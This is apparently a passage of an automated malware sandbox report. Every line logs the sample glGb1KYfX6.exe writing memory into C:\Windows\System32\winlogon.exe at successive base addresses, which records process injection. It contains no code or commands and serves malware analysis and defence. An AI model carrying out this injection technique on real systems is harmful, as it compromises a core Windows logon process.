Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory written: C:\Windows\System32\winlogon.exe base: CF21000Jump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory written: C:\Windows\System32\winlogon.exe base: CF34000Jump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory written: C:\Windows\System32\winlogon.exe base: CF36000Jump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory written: C:\Windows\System32\winlogon.exe base: CF38000Jump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory written: C:\Windows\System32\winlogon.exe base: CF40000Jump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory written: C:\Windows\System32\winlogon.exe base: CF41000Jump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory written: C:\Windows\System32\winlogon.exe base: CF54000Jump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory written: C:\Windows\System32\winlogon.exe base: CF56000Jump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory written: C:\Windows\System32\winlogon.exe base: CF58000Jump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory written: C:\Windows\System32\winlogon.exe base: CF60000Jump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory written: C:\Windows\System32\winlogon.exe base: CF61000Jump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory written: C:\Windows\System32\winlogon.exe base: CF74000Jump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory written: C:\Windows\System32\winlogon.exe base: CF76000Jump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory written: C:\Windows\System32\winlogon.exe base: CF78000Jump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory written: C:\Windows\System32\winlogon.exe base: CF80000Jump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory written: C:\Windows\System32\winlogon.exe base: CF81000Jump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory written: C:\Windows\System32\winlogon.exe base: CF94000Jump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory written: C:\Windows\System32\winlogon.exe base: CF96000Jump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory written: C:\Windows\System32\winlogon.exe base: CF98000Jump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory written: C:\Windows\System32\winlogon.exe base: CFA0000Jump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory written: C:\Windows\System32\winlogon.exe base: CFA1000Jump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory written: C:\Windows\System32\winlogon.exe base: CFB4000Jump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory written: C:\Windows\System32\winlogon.exe base: CFB6000Jump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory written: C:\Windows\System32\winlogon.exe base: CFB8000Jump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory written: C:\Windows\System32\winlogon.exe base: CFC0000Jump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory written: C:\Windows\System32\winlogon.exe base: CFC1000Jump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory written: C:\Windows\System32\winlogon.exe base: CFD4000Jump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory written: C:\Windows\System32\winlogon.exe base: CFD6000Jump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory written: C:\Windows\System32\winlogon.exe base: CFD8000Jump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory written: C:\Windows\System32\winlogon.exe base: CFE0000Jump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory written: C:\Windows\System32\winlogon.exe base: CFE1000Jump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory written: C:\Windows\System32\winlogon.exe base: CFF4000Jump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory written: C:\Windows\System32\winlogon.exe base: CFF6000Jump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory written: C:\Windows\System32\winlogon.exe base: CFF8000Jump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory written: C:\Windows\System32\winlogon.exe base: D000000Jump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory written: C:\Windows\System32\winlogon.exe base: D001000Jump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory written: C:\Windows\System32\winlogon.exe base: D014000Jump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory written: C:\Windows\System32\winlogon.exe base: D016000Jump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory written: C:\Windows\System32\winlogon.exe base: D018000Jump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory written: C:\Windows\System32\winlogon.exe base: D020000Jump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory written: C:\Windows\System32\winlogon.exe base: D021000Jump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory written: C:\Windows\System32\winlogon.exe base: D034000Jump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory written: C:\Windows\System32\winlogon.exe base: D036000Jump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory written: C:\Windows\System32\winlogon.exe base: D038000Jump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory written: C:\Windows\System32\winlogon.exe base: D040000Jump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory written: C:\Windows\System32\winlogon.exe base: D041000Jump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory written: C:\Windows\System32\winlogon.exe base: D054000Jump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory written: C:\Windows\System32\winlogon.exe base: D056000Jump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory written: C:\Windows\System32\winlogon.exe base: D058000Jump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory written: C:\Windows\System32\winlogon.exe base: D060000Jump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory written: C:\Windows\System32\winlogon.exe base: D061000Jump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory written: C:\Windows\System32\winlogon.exe base: D074000Jump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory written: C:\Windows\System32\winlogon.exe base: D076000Jump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory written: C:\Windows\System32\winlogon.exe base: D078000Jump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory written: C:\Windows\System32\winlogon.exe base: D080000Jump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory written: C:\Windows\System32\winlogon.exe base: D081000Jump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory written: C:\Windows\System32\winlogon.exe base: D094000Jump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory written: C:\Windows\System32\winlogon.exe base: D096000Jump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory written: C:\Windows\System32\winlogon.exe base: D098000Jump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory written: C:\Windows\System32\winlogon.exe base: D0A0000Jump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory written: C:\Windows\System32\winlogon.exe base: D0A1000Jump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory written: C:\Windows\System32\winlogon.exe base: D0B4000Jump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory written: C:\Windows\System32\winlogon.exe base: D0B6000Jump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory written: C:\Windows\System32\winlogon.exe base: D0B8000Jump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory written: C:\Windows\System32\winlogon.exe base: D0C0000Jump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory written: C:\Windows\System32\winlogon.exe base: D0C1000Jump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory written: C:\Windows\System32\winlogon.exe base: D0D4000Jump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory written: C:\Windows\System32\winlogon.exe base: D0D6000Jump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory written: C:\Windows\System32\winlogon.exe base: D0D8000Jump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory written: C:\Windows\System32\winlogon.exe base: D0E0000Jump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory written: C:\Windows\System32\winlogon.exe base: D0E1000Jump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory written: C:\Windows\System32\winlogon.exe base: D0F4000Jump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory written: C:\Windows\System32\winlogon.exe base: D0F6000Jump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory written: C:\Windows\System32\winlogon.exe base: D0F8000Jump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory written: C:\Windows\System32\winlogon.exe base: D100000Jump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory written: C:\Windows\System32\winlogon.exe base: D101000Jump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory written: C:\Windows\System32\winlogon.exe base: D114000Jump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory written: C:\Windows\System32\winlogon.exe base: D116000Jump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory written: C:\Windows\System32\winlogon.exe base: D118000Jump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory written: C:\Windows\System32\winlogon.exe base: D120000Jump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory written: C:\Windows\System32\winlogon.exe base: D121000Jump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory written: C:\Windows\System32\winlogon.exe base: D134000Jump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory written: C:\Windows\System32\winlogon.exe base: D136000Jump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory written: C:\Windows\System32\winlogon.exe base: D138000Jump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory written: C:\Windows\System32\winlogon.exe base: D140000Jump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory written: C:\Windows\System32\winlogon.exe base: D141000Jump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory written: C:\Windows\System32\winlogon.exe base: D154000Jump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory written: C:\Windows\System32\winlogon.exe base: D156000Jump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory written: C:\Windows\System32\winlogon.exe base: D158000Jump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory written: C:\Windows\System32\winlogon.exe base: D160000Jump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory written: C:\Windows\System32\winlogon.exe base: D161000Jump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory written: C:\Windows\System32\winlogon.exe base: D174000Jump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory written: C:\Windows\System32\winlogon.exe base: D176000Jump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory written: C:\Windows\System32\winlogon.exe base: D178000Jump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory written: C:\Windows\System32\winlogon.exe base: D180000Jump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory written: C:\Windows\System32\winlogon.exe base: D181000Jump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory written: C:\Windows\System32\winlogon.exe base: D194000Jump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory written: C:\Windows\System32\winlogon.exe base: D196000Jump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory written: C:\Windows\System32\winlogon.exe base: D198000Jump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory written: C:\Windows\System32\winlogon.exe base: D1A0000Jump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory written: C:\Windows\System32\winlogon.exe base: D1A1000Jump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory written: C:\Windows\System32\winlogon.exe base: D1B4000Jump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory written: C:\Windows\System32\winlogon.exe base: D1B6000Jump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory written: C:\Windows\System32\winlogon.exe base: D1B8000Jump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory written: C:\Windows\System32\winlogon.exe base: D1C0000Jump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory written: C:\Windows\System32\winlogon.exe base: D1C1000Jump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory written: C:\Windows\System32\winlogon.exe base: D1D4000Jump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory written: C:\Windows\System32\winlogon.exe base: D1D6000Jump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory written: C:\Windows\System32\winlogon.exe base: D1D8000Jump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory written: C:\Windows\System32\winlogon.exe base: D1E0000Jump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory written: C:\Windows\System32\winlogon.exe base: D1E1000Jump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory written: C:\Windows\System32\winlogon.exe base: D1F4000Jump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory written: C:\Windows\System32\winlogon.exe base: D1F6000Jump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory written: C:\Windows\System32\winlogon.exe base: D1F8000Jump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory written: C:\Windows\System32\winlogon.exe base: D200000Jump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory written: C:\Windows\System32\winlogon.exe base: D201000Jump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory written: C:\Windows\System32\winlogon.exe base: D214000Jump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory written: C:\Windows\System32\winlogon.exe base: D216000Jump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory written: C:\Windows\System32\winlogon.exe base: D218000Jump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory written: C:\Windows\System32\winlogon.exe base: D220000Jump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory written: C:\Windows\System32\winlogon.exe base: D221000Jump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory written: C:\Windows\System32\winlogon.exe base: D234000Jump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory written: C:\Windows\System32\winlogon.exe base: D236000Jump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory written: C:\Windows\System32\winlogon.exe base: D238000Jump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory written: C:\Windows\System32\winlogon.exe base: D240000Jump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory written: C:\Windows\System32\winlogon.exe base: D241000Jump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory written: C:\Windows\System32\winlogon.exe base: D254000Jump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory written: C:\Windows\System32\winlogon.exe base: D256000Jump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory written: C:\Windows\System32\winlogon.exe base: D258000Jump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory written: C:\Windows\System32\winlogon.exe base: D260000Jump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory written: C:\Windows\System32\winlogon.exe base: D261000Jump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory written: C:\Windows\System32\winlogon.exe base: D274000Jump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory written: C:\Windows\System32\winlogon.exe base: D276000Jump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory written: C:\Windows\System32\winlogon.exe base: D278000Jump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory written: C:\Windows\System32\winlogon.exe base: D280000Jump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory written: C:\Windows\System32\winlogon.exe base: D281000Jump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory written: C:\Windows\System32\winlogon.exe base: D294000Jump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory written: C:\Windows\System32\winlogon.exe base: D296000Jump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory written: C:\Windows\System32\winlogon.exe base: D298000Jump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory written: C:\Windows\System32\winlogon.exe base: D2A0000Jump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory written: C:\Windows\System32\winlogon.exe base: D2A1000Jump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory written: C:\Windows\System32\winlogon.exe base: D2B4000Jump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory written: C:\Windows\System32\winlogon.exe base: D2B6000Jump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory written: C:\Windows\System32\winlogon.exe base: D2B8000Jump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory written: C:\Windows\System32\winlogon.exe base: D2C0000Jump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory written: C:\Windows\System32\winlogon.exe base: D2C1000Jump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory written: C:\Windows\System32\winlogon.exe base: D2D4000Jump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory written: C:\Windows\System32\winlogon.exe base: D2D6000Jump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory written: C:\Windows\System32\winlogon.exe base: D2D8000Jump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory written: C:\Windows\System32\winlogon.exe base: D2E0000Jump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory written: C:\Windows\System32\winlogon.exe base: D2E1000Jump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory written: C:\Windows\System32\winlogon.exe base: D2F4000Jump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory written: C:\Windows\System32\winlogon.exe base: D2F6000Jump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory written: C:\Windows\System32\winlogon.exe base: D2F8000Jump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory written: C:\Windows\System32\winlogon.exe base: D300000Jump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory written: C:\Windows\System32\winlogon.exe base: D301000Jump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory written: C:\Windows\System32\winlogon.exe base: D314000Jump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory written: C:\Windows\System32\winlogon.exe base: D316000Jump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory written: C:\Windows\System32\winlogon.exe base: D318000Jump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory written: C:\Windows\System32\winlogon.exe base: D320000Jump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory written: C:\Windows\System32\winlogon.exe base: D321000Jump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory written: C:\Windows\System32\winlogon.exe base: D334000Jump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory written: C:\Windows\System32\winlogon.exe base: D336000Jump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory written: C:\Windows\System32\winlogon.exe base: D338000Jump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory written: C:\Windows\System32\winlogon.exe base: D340000Jump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory written: C:\Windows\System32\winlogon.exe base: D341000Jump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory written: C:\Windows\System32\winlogon.exe base: D354000Jump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory written: C:\Windows\System32\winlogon.exe base: D356000Jump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory written: C:\Windows\System32\winlogon.exe base: D358000Jump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory written: C:\Windows\System32\winlogon.exe base: D360000Jump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory written: C:\Windows\System32\winlogon.exe base: D361000Jump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory written: C:\Windows\System32\winlogon.exe base: D374000Jump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory written: C:\Windows\System32\winlogon.exe base: D376000Jump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory written: C:\Windows\System32\winlogon.exe base: D378000Jump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory written: C:\Windows\System32\winlogon.exe base: D380000Jump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory written: C:\Windows\System32\winlogon.exe base: D381000Jump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory written: C:\Windows\System32\winlogon.exe base: D394000Jump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory written: C:\Windows\System32\winlogon.exe base: D396000Jump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory written: C:\Windows\System32\winlogon.exe base: D398000Jump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory written: C:\Windows\System32\winlogon.exe base: D3A0000Jump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory written: C:\Windows\System32\winlogon.exe base: D3A1000Jump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory written: C:\Windows\System32\winlogon.exe base: D3B4000Jump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory written: C:\Windows\System32\winlogon.exe base: D3B6000Jump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory written: C:\Windows\System32\winlogon.exe base: D3B8000Jump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory written: C:\Windows\System32\winlogon.exe base: D3C0000Jump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory written: C:\Windows\System32\winlogon.exe base: D3C1000Jump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory written: C:\Windows\System32\winlogon.exe base: D3D4000Jump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory written: C:\Windows\System32\winlogon.exe base: D3D6000Jump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory written: C:\Windows\System32\winlogon.exe base: D3D8000Jump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory written: C:\Windows\System32\winlogon.exe base: D3E0000Jump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory written: C:\Windows\System32\winlogon.exe base: D3E1000Jump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory written: C:\Windows\System32\winlogon.exe base: D3F4000Jump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory written: C:\Windows\System32\winlogon.exe base: D3F6000Jump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory written: C:\Windows\System32\winlogon.exe base: D3F8000Jump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory written: C:\Windows\System32\winlogon.exe base: D400000Jump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory written: C:\Windows\System32\winlogon.exe base: D401000Jump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory written: C:\Windows\System32\winlogon.exe base: D414000Jump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory written: C:\Windows\System32\winlogon.exe base: D416000Jump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory written: C:\Windows\System32\winlogon.exe base: D418000Jump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory written: C:\Windows\System32\winlogon.exe base: D420000Jump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory written: C:\Windows\System32\winlogon.exe base: D421000Jump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory written: C:\Windows\System32\winlogon.exe base: D434000Jump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory written: C:\Windows\System32\winlogon.exe base: D436000Jump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory written: C:\Windows\System32\winlogon.exe base: D438000Jump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory written: C:\Windows\System32\winlogon.exe base: D440000Jump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory written: C:\Windows\System32\winlogon.exe base: D441000Jump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory written: C:\Windows\System32\winlogon.exe base: D454000Jump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory written: C:\Windows\System32\winlogon.exe base: D456000Jump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory written: C:\Windows\System32\winlogon.exe base: D458000Jump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory written: C:\Windows\System32\winlogon.exe base: D460000Jump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory written: C:\Windows\System32\winlogon.exe base: D461000Jump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory written: C:\Windows\System32\winlogon.exe base: D474000Jump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory written: C:\Windows\System32\winlogon.exe base: D476000Jump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory written: C:\Windows\System32\winlogon.exe base: D478000Jump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory written: C:\Windows\System32\winlogon.exe base: D480000Jump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory written: C:\Windows\System32\winlogon.exe base: D481000Jump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory written: C:\Windows\System32\winlogon.exe base: D494000Jump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory written: C:\Windows\System32\winlogon.exe base: D496000Jump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory written: C:\Windows\System32\winlogon.exe base: D498000Jump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory written: C:\Windows\System32\winlogon.exe base: D4A0000Jump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory written: C:\Windows\System32\winlogon.exe base: D4A1000Jump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory written: C:\Windows\System32\winlogon.exe base: D4B4000Jump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory written: C:\Windows\System32\winlogon.exe base: D4B6000Jump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory written: C:\Windows\System32\winlogon.exe base: D4B8000Jump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory written: C:\Windows\System32\winlogon.exe base: D4C0000Jump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory written: C:\Windows\System32\winlogon.exe base: D4C1000Jump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory written: C:\Windows\System32\winlogon.exe base: D4D4000Jump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory written: C:\Windows\System32\winlogon.exe base: D4D6000Jump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory written: C:\Windows\System32\winlogon.exe base: D4D8000Jump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory written: C:\Windows\System32\winlogon.exe base: D4E0000Jump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory written: C:\Windows\System32\winlogon.exe base: D4E1000Jump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory written: C:\Windows\System32\winlogon.exe base: D4F4000Jump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory written: C:\Windows\System32\winlogon.exe base: D4F6000Jump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory written: C:\Windows\System32\winlogon.exe base: D4F8000Jump to behavior
